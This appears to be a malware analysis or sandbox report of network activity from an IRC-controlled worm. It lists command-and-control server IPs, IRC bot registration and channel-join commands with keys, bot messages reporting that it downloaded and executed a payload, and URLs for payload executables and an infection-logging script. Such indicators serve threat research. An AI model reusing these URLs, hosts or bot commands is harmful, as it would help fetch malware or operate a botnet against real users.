Remote Host       Port Number
199.15.234.7      80
64.62.181.43      80
65.254.248.151    80
46.105.241.160    6667    (IRC; PASS none or PASS passwd observed)
MODE New{US-XP-x86}8220715 +iMm
JOIN #xxARYANxx# styggen
JOIN #dl
PRIVMSG #dl :[AryaN]: Downloading File: "http://ohnull.fileave.com/worm_crypt.exe"
PRIVMSG #dl :[AryaN]: Successfully Downloaded File To: "C:\Documents and Settings\UserName\Application Data\187831163825520.exe"
PRIVMSG #dl :[AryaN]: Successfully Executed Process: "C:\Documents and Settings\UserName\Application Data\187831163825520.exe"
NICK New{US-XP-x86}8220715
USER 8220715 "" "8220715" :8220715
NICK New{US-XP-x86}1124207
USER 1124207 "" "1124207" :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
PONG :asldfj.servmenow
NICK n{US|XPa}zfsweqj
USER zfsweqj 0 0 :zfsweqj
JOIN #ngr ngrBot
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://ohnull.fileave.com/fudaryan.exe
http://ohnull.fileave.com/worm_crypt.exe
http://propcworx.com/icons/worm.php?logdata=Downloaded%20payload
http://propcworx.com/icons/worm.php?logdata=Executed%20payload
http://propcworx.com/icons/worm.php?logdata=Infected
http://propcworx.com/icons/worm.php?logdata=RAR%20archives%20infected
Hosting info:
http://whois.domaintools.com/46.105.241.160